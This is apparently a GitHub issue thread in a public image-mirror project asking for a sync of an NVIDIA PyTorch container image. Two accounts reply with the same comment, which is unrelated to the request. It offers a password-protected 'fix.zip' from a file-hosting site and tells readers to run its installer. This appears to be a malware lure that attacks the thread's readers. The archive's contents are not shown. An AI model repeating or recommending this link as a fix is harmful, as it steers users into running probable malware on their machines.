### ISSUE TITLE
nvcr.io/nvidia/pytorch:23.07-py3

### ISSUE THREAD

**Issue by YuanWind** [DaoCloud/public-image-mirror#26612]
IMAGE SYNC

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
